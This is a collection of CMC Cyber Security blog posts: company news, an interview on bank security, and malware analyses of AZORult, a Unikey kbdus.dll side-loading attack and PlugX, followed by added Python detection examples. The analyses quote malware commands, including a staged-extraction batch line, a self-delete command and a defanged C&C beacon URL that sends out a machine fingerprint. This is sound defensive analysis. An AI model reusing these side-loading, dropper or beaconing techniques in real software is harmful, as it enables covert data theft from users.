CMC Cyber Security has recently completed a security assessment and product quality testing engagement to help protect Finhay's technology products against cyber attacks.
Industrial Revolution 4.0 is unfolding rapidly and is bringing visible change to banking, investment and savings. That change is reshaping governance models, management structures, and the products and services banks offer, and at the same time it demands stronger risk management, network security and protection of customer information.
Against this background, CMC Cyber Security advised on and carried out security testing of Finhay's website and its mobile applications. CMC CS experts assessed the products' security posture through penetration testing, looking for vulnerabilities and recommending fixes to the partner. CMC also advised Finhay on monitoring, early warning and control of sensitive-data leakage to the Internet, so that Finhay can keep improving its internal data defence and protection plans.
Through this cooperation, CMC Cyber Security helps users of Finhay's products transact with confidence, without worrying about financial risk in cyberspace, and supports Finhay in delivering products that have been assessed as safe against cyber attack for its investors.
Finhay is a leading Vietnamese application for small and medium-sized investment and savings. With diverse, innovative personal finance products on a digital platform, financial transparency and a strong technology base, Finhay lets users accumulate and invest flexibly from small amounts of capital to build assets and protect their future.
CMC Cyber Security is a member company of CMC Group, one of the top two technology corporations in Vietnam. CMC Cyber Security is built on a team of qualified experts holding many international certifications, with the goal of becoming the Group's strategic unit for research and development of information security software and services.
We provide personal anti-virus products, information security assessment and monitoring services, SOC construction and information security consulting for organisations and enterprises. The company aims to bring customers, whether individuals, businesses or organisations in any sector, genuinely effective security solutions at reasonable prices with the most professional service quality.
CMC Cyber Security has recently added an engineer holding the Offensive Security Certified Professional (OSCP) certification, one of the most respected penetration-testing certifications in the world.
OSCP is a certification programme focused on penetration testing and offensive skills. It has two parts: a 24-hour hands-on penetration test, followed by a report written in English; the report is assessed within seven days before the result is officially released.
OSCP is among the top five most sought-after penetration-testing certifications for security professionals and one of the more demanding practical exams. During the exam the candidate must demonstrate the ability to enumerate the target network, find security gaps or weaknesses in its systems, assess the resulting risk and work out response and remediation methods. Arguably what the exam tests most is sharp thinking and execution under heavy pressure.
Mr. Ha The Phuong, Deputy General Director of CMC Cyber Security, said: "In order to provide security assessment services of international standard, the company always focuses on raising the level and capacity of its engineers. At the same time, CMC Cyber Security always encourages and supports engineers to take part in competitions and to gain the world's most prestigious and valuable certificates."
CMC Cyber Security has more than ten years of experience providing professional information security assessment services, with many projects for large customers; its engineers' OSCP certification is a practical complement to the quality of its assessments of critical information systems at both national and international level.
It is also clear evidence of the capacity and qualifications of CMC Cyber Security's information security engineers, giving customers more confidence in the quality of the information security assessment services the company provides.
On the morning of July 3, 2020, representatives of CMC Cyber Security attended the launch ceremony for "SOC service platforms meeting the requirements for connecting and sharing information" at the headquarters of the Ministry of Information and Communications (MIC).
The event was attended by Deputy Minister of Information and Communications Nguyen Thanh Hung, representatives of units under the Ministry, the IT and information security units of ministries and ministerial-level agencies, and the 63 provincial Departments of Information and Communications.
At the event, CMC Cyber Security was recognised as a provider whose SOC service meets the technical and personnel standards for securing the information systems of ministries, agencies and local units, and which meets the requirements for connecting and sharing information with the National Cyber Security Monitoring Center in the spirit of Directive 14/CT-TTg and Official Dispatch No. 1552/BTTTT-CATTT.
Speaking at the ceremony, Deputy Minister Nguyen Thanh Hung said the criteria for selecting the platforms were: good quality, the ability to be provided as a service, and no requirement for the agency or organisation to have its own specialised IT and network security force, so that the platform can be deployed immediately.
Eight enterprises were recognised as providing SOC service platforms that meet the requirements for connecting and sharing information with the National Cyber Security Monitoring Center under the Department of Information Security, Ministry of Information and Communications: CMC Cyber Security, Viettel Cyber Security, VNPT, BKAV, FPT, CyRadar, VNCS Global and SAVIS.
This is an opportunity for security service providers to reach, listen to and learn about the needs and conditions of the provincial Departments of Information and Communications, so that they can better deliver SOC deployments and expand their market.
The SOC platforms not only help secure the national digital transformation as directed by the Prime Minister, but also help ministries, sectors and localities cut the workload and time of implementing the "4-layer" security model by 90%, and encourage Vietnamese businesses to invest in advanced technology and solutions, moving towards an ecosystem of "Made in Vietnam" security products.
The launch also marked an important step, affirming that Vietnamese enterprises have sufficient research and development capability and are ready to provide network safety and security services for the domestic market and, in time, internationally.
Taking advantage of the Covid-19 pandemic, attackers have exploited people's hunger for information to spread malware. In this case the attacker tricks the user into downloading and running a malicious program whose visible interface is fetched from a legitimate source while the malware runs in the background.
The malware was identified as AZORult, an information stealer first seen in 2016 that collects browser data such as cookies, browsing history, user IDs and passwords, and even encryption keys.
File Type: Portable Executable 32
File Info: Microsoft Visual C++ 8, AutoIt
The attacker tricks the user into downloading a file named "Corona-virus-Map.com.exe". The file is an AutoIt-compiled executable, so it can be decompiled easily to recover the script source.
The script creates the folder "%APPDATA%\Z11062600", drops two files into it, "Corona.exe" and "Corona-virus-Map.com.exe", and launches both.
File Type: Portable Executable 32
File Info: Microsoft Visual Studio .NET
The dropped "Corona-virus-Map.com.exe" is a .NET executable; after unpacking and analysis, its main function is to load "hxxps://gisanddata[.]maps.arcgis[.]com/apps/opsdashboard/index[.]html#/bda7594740fd40299423467b48e9ecf6" (the Johns Hopkins dashboard) and display the Covid-19 infection map to the user, so that the user sees what they expected and suspects nothing.
File Type: Portable Executable 32
File Info: RAR archive (self-extracting)
"Corona.exe" is a self-extracting RAR archive; when launched it writes two files, Corona.bat and Corona.sfx.exe. The batch file contains:
Corona.sfx.exe -p3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r -dC:\Windows\System32
Corona.exe uses cmd to run Corona.bat, which launches Corona.sfx.exe; the -p switch supplies the archive password and -d the extraction directory, so the next stage is unpacked into C:\Windows\System32. Corona.sfx.exe in turn writes and runs another Corona.exe with the same role as the first, which drops and launches the next two files, bin.exe and Build.exe, in the folder "%APPDATA%\Z58538177". The resulting process tree is shown in the accompanying figure.
File Type: Portable Executable 32
File Info: Borland Delphi
This is the main executable of the malware, identified by security vendors as AZORult, an information stealer. Once on the machine it gathers identifying information such as the machine GUID, version information, username and computer name, and derives its own GUID:
From that GUID the malware builds a mutex name, so that two instances do not run at the same time.
The malware re-encodes the identity information and then decrypts the C&C address.
It connects to the C&C server, sends the victim's identity information, and the server answers with a large amount of data.
After decoding the downloaded data we can see that it contains a set of dynamic libraries, which the malware writes to the folder "%TEMPda".
The sample carries a long list of locations that reveal its targets: data of browsers such as Firefox, Chrome, Chromium, Brave, Edge, Comodo, Kometa, Coc Coc, Opera, 360 and others, email clients such as Outlook and Thunderbird, and many more. The downloaded libraries supply the functions the malware needs to read that data.
For example, the malware queries Outlook profile data in the registry:
or steals saved FileZilla server credentials:
Even the victim's cryptocurrency wallets are targeted:
Finally the malware encrypts the captured data, sends it to the C&C server, and then runs a command to delete its own file:
C:\Windows\system32\timeout.exe 3 & del "bin.exe"
Hash: F6A5E02F46D761D3890DEBD8F2084D37
File Type: Portable Executable 32
File Info: UPX v3.0, AutoIt
Many tools can unpack UPX, CFF Explorer among them. When executed, this file copies itself to "%APPDATA%\amd64_netfx4-system.runti..dowsruntime.ui.xaml.Globalization.Fontgroups.exe" and runs the copy. As with the first dropper, decompiling the AutoIt executable gives the script source.
The sample is not heavily obfuscated, which saves a lot of analysis time. From the analysis and from public information, the sample's main activity is to steal browser cookies and encryption keys, disable the proxy configuration, and change file attributes to hide itself.
- MD5: 73da2c02c6f8bfd4662dc84820dcd983
- MD5: 07b819b4d602635365e361b96749ac3e
- MD5: 1beba1640f5573cbac5552ae02c38f33
- MD5: c4852ee6589252c601bc2922a35dd7da
- MD5: F6A5E02F46D761D3890DEBD8F2084D37
- MD5: e9dcbecca02b600ce135f7d58b8cd830
- MD5: 3cb9fc1ee05f49438455ba1aea3bca4e
- coronavirusstatus[.]space
- Search for files with the MD5 hashes above in the directories:
- %APPDATA%\Z11062600
- %APPDATA%\Z58538177
- %APPDATA%\amd64_netfx4-system.runti..dowsruntime.ui.xaml
- Terminate any running processes of those files
- Delete the files (only if present and the hash matches)
- Delete the scheduled task that points to Windows.Globalization.Fontgroups.exe
- Alternatively, use software from a trusted antivirus vendor to clean the machine
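As an added example (not part of the original CMC write-up), the first two remediation steps above can be turned into a host sweep: walk the drop directories named in the report under %APPDATA%, hash every file with MD5 and report anything whose hash is in the published list. It only finds and reports, so it is safe to run before deciding to terminate or delete anything. The `demo()` scenario, the file contents in it and the hash it adds to the list are constructed for the example; the directory prefixes and the seven MD5 values are those of the report.

```python
"""Host-side IOC sweep for the AZORult campaign described above.
Added example; the demo data below is constructed, not real malware."""
import hashlib
import os
import tempfile

# MD5 hashes listed in the report above (lower-cased for comparison).
AZORULT_MD5 = {
    "73da2c02c6f8bfd4662dc84820dcd983",
    "07b819b4d602635365e361b96749ac3e",
    "1beba1640f5573cbac5552ae02c38f33",
    "c4852ee6589252c601bc2922a35dd7da",
    "f6a5e02f46d761d3890debd8f2084d37",
    "e9dcbecca02b600ce135f7d58b8cd830",
    "3cb9fc1ee05f49438455ba1aea3bca4e",
}

# Drop directories named in the report, relative to %APPDATA%. The third
# name is truncated ("..") in the report, so it is matched as a prefix.
DROP_DIR_PREFIXES = ("Z11062600", "Z58538177", "amd64_netfx4-system.runti")


def md5_of_file(path, chunk=1 << 20):
    """MD5 of a file, read in chunks so large droppers do not load into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def candidate_dirs(appdata):
    """Subdirectories of appdata whose name starts with a known drop-dir prefix."""
    out = []
    try:
        names = os.listdir(appdata)
    except OSError:           # no such directory or no permission
        return out
    for name in names:
        full = os.path.join(appdata, name)
        if os.path.isdir(full) and name.startswith(DROP_DIR_PREFIXES):
            out.append(full)
    return sorted(out)


def sweep(appdata, iocs=AZORULT_MD5):
    """Hash every file below the candidate drop directories; return [(path, md5)] hits."""
    hits = []
    for d in candidate_dirs(appdata):
        for root, _dirs, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    digest = md5_of_file(path)
                except OSError:   # locked or vanished; skip rather than abort the sweep
                    continue
                if digest.lower() in iocs:
                    hits.append((path, digest))
    return hits


def demo():
    """Constructed scenario: a fake %APPDATA% with one 'dropped' file and one decoy.
    The dropped file's hash is added to the IOC set so that the match path runs."""
    appdata = tempfile.mkdtemp()
    drop = os.path.join(appdata, "Z11062600")
    os.makedirs(drop)
    planted = os.path.join(drop, "Corona.exe")
    with open(planted, "wb") as f:
        f.write(b"MZ constructed sample, not real malware\n")
    with open(os.path.join(drop, "readme.txt"), "wb") as f:
        f.write(b"benign file\n")
    iocs = AZORULT_MD5 | {md5_of_file(planted)}
    return [(os.path.basename(p), h) for p, h in sweep(appdata, iocs)]


if __name__ == "__main__":
    real_appdata = os.environ.get("APPDATA")   # set on Windows; demo elsewhere
    for path, digest in (sweep(real_appdata) if real_appdata else demo()):
        print(f"IOC match: {path} {digest}")
```

Matching on MD5 alone is deliberately conservative: a repacked build of the same dropper will not match, so treat an empty result as "these exact samples are absent", not as a clean bill of health, and still look for the scheduled task and unexpected files in those folders.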
The severity of the Covid-19 pandemic is beyond dispute. Criminals are making full use of the public's interest in coronavirus information, and many people may fall prey to these attacks. Users need to protect themselves calmly against both biological and computer viruses. For a safe pandemic situation map, visit the Johns Hopkins University site at https://coronavirus.jhu.edu/map.html
In recent years a series of cyber attacks on banks and financial institutions in Vietnam has occurred, and the trend is upward. Most recently, on November 21, information on about 2 million Vietnamese bank customers was shared free of charge on an international forum used by hackers for data sharing.
Speaking at the Cybersecurity and Information Security Forum 2019, held yesterday, November 27, in Ho Chi Minh City, experts said that cyber attacks on the critical information infrastructure of economic and financial organisations and groups remain complicated and are growing in sophistication and danger. According to Nguyen Trong Duong, Deputy Director of the Department of Information Security (Ministry of Information and Communications), banks are among the regular targets of cybercriminals.
To shed more light on the information security (ATTT) situation of units and businesses in banking and finance, ICTnews spoke with Mr. Ha The Phuong, Deputy General Director of CMC Cyber Security.
Mr. Ha The Phuong, Deputy General Director of CMC Cyber Security.
From your experience supporting agencies, units and businesses recently, how do you assess the investment, awareness and capacity of banks and financial institutions to ensure information security?
In a context where the domestic security market is still young and Vietnam has few policies and standards to secure the industry, large banks and financial institutions, thanks to their earlier integration into the international market, have invested in securing their systems according to international standards.
Investment differs greatly from bank to bank, though: some banks invest long term and build their own team of security experts, some choose to outsource information security services, and some use only foreign solutions that are rated among the best in the world. In general, though, large banks and financial institutions all have a stronger and more realistic view of, and investment in, security.
However, reality shows that investing in good technology is only part of an organisation's information security task. There are many internal tasks banks must also carry out: monitoring, having suitable incident response options and internal risk management options, having a coordination process between departments, and running regular drills to train the team and to test the process.
In your view, were large cyber attacks such as the incident exposing customer information of banks and major service providers a "wake-up call" that made businesses pay more attention to information security?
Any security breach harms the organisation: a small one disrupts a particular component, a larger one affects the organisation's customers or its reputation. Such incidents always serve as good examples to persuade organisations to pay more attention to securing their systems.
I think units and businesses should not be ashamed of, or hide, information security incidents. They need to be analysed thoroughly and a solution devised that addresses the root cause so that the incident does not recur.
CMC's leadership has remarked that an information security incident is "hot" for only about two weeks before it is forgotten, and that many units then neglect securing their systems. Has this situation improved?
The situation has improved, but it still exists in many businesses. As I said above, this is a matter of the mindset and responsibility of the head of the organisation. If the head of the organisation or business does not care about security and does not invest enough in it, the technical staff below will not be able to defend against attacks by hackers.
In fact, when a security incident occurs, many business owners immediately blame the IT department or the department in charge of information security, rather than re-evaluating the organisation they are supposed to be protecting: is it secure? Has enough been invested in security?
The Deputy General Director of CMC Cyber Security says that limited IT and information security resources can always be addressed with outsourced services (photo: CMC SOC).
So, to prevent and promptly handle possible network attacks, what should banks and financial institutions pay attention to?
In my opinion the problem is no longer which solution or technology to use for defence; there are already many new and good solutions, advisors and technologies, both Vietnamese and international. The important thing now is to change the awareness of the leadership, who must take information security as their own responsibility, pay proper attention to it and invest in it.
One measure I think should be taken is to make the heads of agencies and organisations responsible for information security incidents, rather than pushing this very large responsibility onto the information security or IT department.
According to a survey by the Department of Information Security, the two biggest obstacles to security assurance in banks are employees frequently violating information security and privacy policies, and limited IT and information security human resources. What do banks need to do to overcome these?
Training, communicating security awareness, incident handling drills and 24/7 monitoring are measures an organisation can apply to reduce users' security policy violations. Training and drills need to be done regularly and treated as an internal communication task the organisation must perform, rather than just issuing enough regulations and stopping there.
Limited IT and security resources can always be solved with outsourced services. Domestic businesses should trust and give opportunities to outsourced security services provided by Vietnamese companies. The Vietnamese information security community always wants to improve the quality of its services and join hands to help domestic businesses confront today's increasingly dangerous and complex security risks.
CMC's CMDD monitoring system has detected malware abusing the Unikey software to attack Vietnamese users. Unikey is a very popular Vietnamese input method for Windows. An attacker can build a Unikey installer that uses the genuine UnikeyNT.exe but places a malicious DLL in the same directory, and then use a range of techniques (exploits, phishing and so on) to get users to run it. Users should therefore download Unikey only from the official site unikey.org, avoid opening unknown files from unusual paths, and keep Windows patched.
In the case below, a kbdus.dll (32-bit PE) containing malicious code was placed in the same directory as UnikeyNT.exe (version 4.0 RC2 Build 091101 NT). The attacker also set the timestamps of kbdus.dll to match those of UnikeyNT.exe to make it look legitimate; in fact the file was compiled in early October 2019.
kbdus.dll is the keyboard layout library Windows loads when the US layout (id 0x00000409) is used. The attacker studied how Unikey works and noticed that when UnikeyNT.exe loads its companion DLL, UKhook40.dll, that DLL calls LoadKeyboardLayoutA to load the layout with id 0x00000409, which in turn loads kbdus.dll. Under the default DLL search order the application's own directory is searched before System32, so the kbdus.dll placed next to UnikeyNT.exe is loaded instead of the legitimate one and the malicious code inside it runs.
In the DLL's DllMain, the malicious code creates a new thread to carry out its behaviour.
The malware creates a mutex named "Global\mFNXzY0g" to avoid running twice. Most of the strings it uses are obfuscated, either as stack strings or with a simple encoding routine of its own: every character is shifted up by one, so "K" (0x4b) is stored as "L" (0x4c). In IDA Pro, IDAPython can be used to patch these bytes back; for the stack strings, the FLARE team's ironstrings.py script simplifies the analysis.
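To make the +1 shift concrete, here is an added example (not code from the original analysis) that does for a binary blob what `strings` does for plaintext: it applies the inverse shift and keeps every run of bytes that becomes printable ASCII. The sample blob is constructed for the example; the real kbdus.dll is not embedded, and the only string taken from the report is the mutex name.

```python
"""Recover strings hidden with the +1 byte shift described above.
Added example; SAMPLE_BLOB is constructed, not bytes from the real DLL."""


def shift_bytes(data, delta):
    """Add delta to every byte modulo 256: delta=+1 encodes, delta=-1 decodes."""
    return bytes((b + delta) & 0xFF for b in data)


def decode_string(encoded):
    """Undo the malware's encoding for one string ("L" -> "K")."""
    return shift_bytes(encoded, -1).decode("ascii")


def find_shifted_strings(blob, min_len=4, delta=-1):
    """Return (offset, text) for every run of at least min_len bytes that is
    printable ASCII after applying delta. With delta=-1 this undoes the +1
    obfuscation. Plain (unencoded) strings can also slip through, since most
    printable bytes minus one are still printable; review the output."""
    found = []
    run_start = None
    for i, b in enumerate(blob):
        c = (b + delta) & 0xFF
        printable = 0x20 <= c <= 0x7E
        if printable and run_start is None:
            run_start = i
        elif not printable and run_start is not None:
            if i - run_start >= min_len:
                found.append((run_start, shift_bytes(blob[run_start:i], delta).decode("ascii")))
            run_start = None
    if run_start is not None and len(blob) - run_start >= min_len:
        found.append((run_start, shift_bytes(blob[run_start:], delta).decode("ascii")))
    return found


# Constructed blob: two strings obfuscated with the +1 shift, separated by
# filler bytes that stay non-printable after decoding.
MUTEX_NAME = b"Global\\mFNXzY0g"          # name reported in the analysis above
SAMPLE_BLOB = (
    b"\x00\x01\x02"
    + shift_bytes(MUTEX_NAME, +1)
    + b"\x00\x00\xff"
    + shift_bytes(b"xmllite.dll", +1)
    + b"\x00"
)

if __name__ == "__main__":
    for offset, text in find_shifted_strings(SAMPLE_BLOB):
        print(f"0x{offset:04x}: {text}")
```

The same `shift_bytes(..., -1)` is what an IDAPython patch loop would write back over the encoded bytes with `idc.patch_byte`, so the decoded strings show up in the disassembly instead of having to be decoded by hand at each use.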
After creating and checking the mutex, the malware reads data from specific registry keys, most likely written when the user ran an installer prepared by the attacker. The first is the value "CB5JQLWSYQP2CWVRMJ8NB4CCUE1B8K4A" under the key "HKEY_CLASSES_ROOT\.kci\PersistenHandler". It holds an envelope structure followed by XML data; the structure carries values the malware can check after decoding, such as the size of the XML data before and after decoding and its MD5 before and after.
The decoded data is XML, which the malware parses into memory using the API of the xmllite.dll library.
The next value read from "HKEY_CLASSES_ROOT\.kci\PersistenHandler" is "F430D64D98E6EAC972380D568F080E08". It holds another structure with the same size and MD5 fields, from which the malware decrypts a PE file using the same decryption method and checks as for the XML data.
This PE file is a DLL named Knocker.dll exporting a function named Construct; its compile time is almost the same as that of kbdus.dll. The malware loads the DLL into memory, then locates Construct and calls it, passing the address of the structure holding the previously read XML data.
Using VirtualAlloc, VirtualProtect, LoadLibrary and GetProcAddress, the PE file is mapped into memory like a regularly loaded PE image. Before calling Construct, the malware also runs the DLL's DllMain so that the DLL is properly initialised.
Knocker.dll - Construct
In Construct, the malicious code copies the data received as its parameter into another memory area, then starts collecting information about the user's computer: CPU, RAM, Windows version, computer name, organisation, user information, language, time zone, network adapter, disk partitions and operating system installation details.
The malware then stores a UUID under "HKEY_CLASSES_ROOT\.kci\PersistenHandler", made up of two MD5 values: the first derived from the user SID, username and computer name, the second from the CPU, RAM, disk and network adapter values.
It then builds a string identifying the machine in the form "PC:%s;MAC:%s;SerVer:%f". This data is placed in a struct, which the malware encodes in base64 and sends with a GET request.
The request to the C&C has the form (note that it is plaintext HTTP sent to port 443):
hxxp://news.vnxahoi[.]com:443/4BwhFJ9p/job.php?[UUID][data_in_base64]
with the User-Agent:
Mozilla/4.0 (compatible; MSIE 8.0; Win32)
and the headers:
Content-Length: %d\r\nCache-Control: no-cache\r\nMD5: %s\r\nConnection: Close\r\n
On the first connection the malware waits to receive a command to execute. The second connection is similar but reports the result of the command, using POST and a request of the form:
hxxp://news.vnxahoi[.]com:443/4BwhFJ9p/job.php?[UUID][create_process_state]
This is the last step of the malware's execution. At the time of analysis the server responded 404 Not Found, so the malware could not proceed with any further behaviour.
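The beacon format above is specific enough to hunt for in proxy logs. The following is an added example (not part of the original CMC analysis) that scores each request against the literal indicators from the report (the C&C host, plaintext HTTP on port 443, the /4BwhFJ9p/job.php path and the MSIE 8.0 / Win32 User-Agent) and decodes the query string. Assumptions: the log format (tab-separated time, client, method, URL, status, User-Agent) and the log lines are constructed for the example, the UUID is taken to be the two concatenated MD5 digests (64 hex characters) described above, and for the sample the base64 part is assumed to decode straight to the "PC:..;MAC:..;SerVer:.." string; the real struct layout is not given in the report.

```python
"""Proxy-log detection for the kbdus.dll / Knocker.dll beacon described above.
Added example; log format and SAMPLE_LOG are constructed."""
import base64
import re
from urllib.parse import urlsplit

C2_HOST = "news.vnxahoi.com"                 # written defanged in the report
C2_PATH = "/4BwhFJ9p/job.php"
C2_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"


def parse_line(line):
    """Assumed log format: tab-separated time, client, method, URL, status, User-Agent."""
    ts, client, method, url, status, ua = line.rstrip("\n").split("\t")
    return {"ts": ts, "client": client, "method": method, "url": url, "status": status, "ua": ua}


def decode_query(query):
    """Split '?[UUID][data_in_base64]'. Assumes the UUID is two concatenated
    MD5 hex digests (64 hex chars); the remainder is base64. Returns
    (uuid, decoded_bytes) or (None, None) when the shape does not match."""
    if len(query) < 64 or not re.fullmatch(r"[0-9a-fA-F]{64}", query[:64]):
        return None, None
    uuid, b64 = query[:64], query[64:]
    try:
        data = base64.b64decode(b64, validate=True)
    except ValueError:        # binascii.Error is a ValueError subclass
        data = None
    return uuid, data


def score(rec):
    """Names of the indicators that fire for one parsed request."""
    u = urlsplit(rec["url"])
    hits = []
    if u.hostname and u.hostname.lower() == C2_HOST:
        hits.append("c2-host")
    if u.scheme == "http" and u.port == 443:      # cleartext HTTP to the TLS port
        hits.append("plain-http-on-443")
    if u.path == C2_PATH:
        hits.append("c2-path")
    if rec["ua"] == C2_UA:
        hits.append("c2-user-agent")
    if rec["method"] in ("GET", "POST") and u.query:
        _uuid, data = decode_query(u.query)
        if data is not None and data.startswith(b"PC:"):   # first-contact fingerprint
            hits.append("fingerprint-beacon")
    return hits


def scan(lines):
    """Return (client, ts, hits, decoded_text) for requests with two or more indicators."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        hits = score(rec)
        if len(hits) >= 2:
            _uuid, data = decode_query(urlsplit(rec["url"]).query)
            text = data.decode("ascii", "replace") if data else None
            alerts.append((rec["client"], rec["ts"], hits, text))
    return alerts


# Constructed sample: first-contact GET, a benign request, then the POST
# that reports the command result (base64 "1" standing in for the state value).
_UUID = "0123456789abcdef" * 4              # two fake MD5 digests concatenated
_FP = b"PC:WS-01;MAC:00-11-22-33-44-55;SerVer:1.000000"
SAMPLE_LOG = "\n".join([
    "\t".join(["2019-11-20T08:01:02", "10.0.0.15", "GET",
               f"http://{C2_HOST}:443{C2_PATH}?{_UUID}{base64.b64encode(_FP).decode()}",
               "404", C2_UA]),
    "\t".join(["2019-11-20T08:01:05", "10.0.0.16", "GET",
               "http://intranet.example.com/index.html", "200",
               "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0"]),
    "\t".join(["2019-11-20T08:01:09", "10.0.0.15", "POST",
               f"http://{C2_HOST}:443{C2_PATH}?{_UUID}MQ==", "404", C2_UA]),
])

if __name__ == "__main__":
    for client, ts, hits, text in scan(SAMPLE_LOG.splitlines()):
        print(f"{ts} {client} {','.join(hits)} decoded={text!r}")
```

Requiring two indicators keeps a single coincidence (an old MSIE 8 User-Agent, say) from alerting on its own, while the host and path still match even if the operators change the User-Agent; the 404 status on the sample lines mirrors the dead C&C observed in the report and is deliberately not used as a signal.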
C&C information
Checking the C&C domain shows that it resolves to the IP 125[.]212.218.121.
Several other domains were found to resolve to the same IP.
Risk assessment
This is a well-researched, very dangerous and hard-to-detect attack campaign. Unikey is such a popular input method that almost every Windows computer in Vietnam has it installed, and the attacker only needs to drop kbdus.dll into the Unikey folder to compromise the victim's machine. Users should check their Unikey installation directory carefully, remove any kbdus.dll found there, or use anti-malware products to protect their computers. CMC's CMDD now detects this kbdus.dll; users can download it at https://cmccybersecurity.com/cmc-antivirus-free/
This morning, at the Ministry of Information and Communications, CMC Cyber Security General Director Ta Hoang Linh and Deputy General Director Ha The Phuong attended the press conference for "Vietnam Information Security Day 2019", to be held on November 29.
Speaking at the press conference, Mr. Ta Hoang Linh, General Director of CMC Cyber Security, said: "The role of information security is becoming more and more important. CMC Cyber Security recognised the importance of the information security field very early and has persevered in it, even though the field is very broad and difficult.
From a business perspective, I think this is an opportunity for Vietnamese businesses to develop products and solutions suited to a particular segment of the information security field. CMC Cyber Security will continue to invest more heavily in its team of experts and its products so that we can contribute our part to the overall development of information security."
Mr. Ta Hoang Linh, General Director of CMC Cyber Security, speaking at the press conference.
The press conference was also attended by Deputy Minister of Information and Communications Nguyen Thanh Hung, leaders of the co-organising bodies, including the Department of Information Security (Ministry of Information and Communications), the Department of Information and Communications (Ministry of Education and Training), Command 86 (Ministry of National Defence), the Government Cipher Committee and Department A05 (Ministry of Public Security), a number of businesses taking part in the event, and representatives of 30 press agencies.
Deputy Minister Nguyen Thanh Hung, President of VNISA, said that this year's conference will be attended by the Director of the Standardization Bureau of the International Telecommunication Union (ITU), who will present views, orientations, recommendations and an assessment of Vietnam's information security ranking.
The Deputy Minister also stressed that ensuring information security is like preventive medicine, following the motto "prevention is better than cure". Awareness is very important for this, avoiding the habit of acting only when the water is already at one's feet. Workshops, exhibitions and related events are organised to raise awareness and enhance training for information security; from awareness come concrete actions.
"Vietnam, like many countries around the world, is accelerating the fourth industrial revolution and digital transformation. Developing national capability in cybersecurity and safety is therefore a prerequisite for building e-government and a digital economy, serving the activities of the state, businesses and the people," said Mr. Vu Quoc Thanh, Vice Chairman and General Secretary of VNISA.
This year's conference has the theme "Enhancing national cybersecurity in the digital era".
Organised on the largest scale ever, Vietnam Information Security Day 2019 covers a broad topic that expresses the aspirations of security workers: "Enhancing national cybersecurity in the digital era".
"This will be an important national forum, the most prominent network safety and security event of 2019 in Vietnam," Mr. Vu Quoc Thanh emphasised.
Information Security Day 2019 is the 12th annual event, chaired by the Vietnam Information Security Association (VNISA) in collaboration with the Department of Information Security (Ministry of Information and Communications) and the Cyberspace Operations Command (Ministry of National Defence), under the auspices of the Ministry of Information and Communications.
The seminar focuses on analysing the Government's vision and orientation for strengthening network safety and security in Vietnam; policies, the current situation and the needs for applying and developing information security (ATTT) technology; and solutions to improve Vietnam's network safety and security ranking.
The conference programme consists of a plenary session in the morning and two thematic sessions in the afternoon, with nearly 30 speeches and presentations from leaders of state management agencies in network safety and security and from managers and senior security experts of large companies at home and abroad.
Mr. Ha The Phuong, Deputy General Director of CMC Cyber Security, answering press questions on current information security issues.
CMC Cyber Security's centralised malware prevention and monitoring system has discovered malware built on the PlugX RAT attacking Vietnamese users; it can steal cookies for sites such as Facebook, Gmail and Outlook even when the user has enabled two-step authentication.
In a new warning issued by CMC Cyber Security about a malware strain using PlugX RAT that is attacking Vietnamese users, expert Bui Hong Son said that once a user has logged in to a website, the login state is saved in cookies. Checks showed that for Facebook these cookies allow an attacker to steal the login session. Exposure of cookies for other sites such as Gmail, Yahoo and Outlook is also very dangerous, since they are all sensitive information an attacker can exploit for malicious purposes.
PlugX is a malicious tool with many variants, used in many APT attacks around the world, including attacks on Vietnam.
According to the analysis by CMC Cyber Security expert Bui Hong Son, the malware runs on the user's computer in stages: an executable signed by a large organisation is run and loads a modified malicious DLL; the DLL reads an accompanying payload file and executes shellcode contained in it; the shellcode decodes and extracts the payload as a DLL and executes it; that DLL installs itself on the system via a Windows service or the registry, spawns sub-processes and injects code into Windows processes; and the injected code carries out the PlugX functions.
After installation and injection into other processes, PlugX begins executing its functions, receiving commands from the C&C (command-and-control server) or directly through the backdoor.
C&C commands include: reading and writing files and directories; keylogging; collecting network information and TCP and UDP connections; port management; managing user sessions (lock screen, log off, shut down, restart); listing processes and their modules and terminating processes;
adding, editing, deleting and querying registry entries; taking screenshots; retrieving information about installed services and changing their settings or status or deleting them; executing SQL queries if SQL Server is found on the victim machine; and creating a backdoor that lets the attacker execute remote commands, directly or indirectly, on the victim's computer.
Stressing that APT attacks are tightly organised, heavily funded, technologically advanced and well prepared, and therefore hard for security systems to detect, CMC Cyber Security expert Bui Hong Son recommends that organisations plan to prevent and counter APT attacks with measures such as: deploying defence in depth from the network perimeter to end devices; using technology, techniques and system monitoring to detect early signs of attack; using vulnerability and threat assessment services to limit attack opportunities; and planning incident response in advance to minimise damage when an attack occurs.
Organisations also need to invest in information security awareness training for their officials and employees, so that they help keep the network and the information they hold safe.
To support these measures, CMC Cyber Security has built a centralised monitoring and defence solution for endpoint devices (CMDD) and a SOC that monitors systems and provides assessment services, security vulnerability reviews and other support services to help organisations and agencies proactively prevent APT attacks. Individual users can download the antivirus software free of charge here.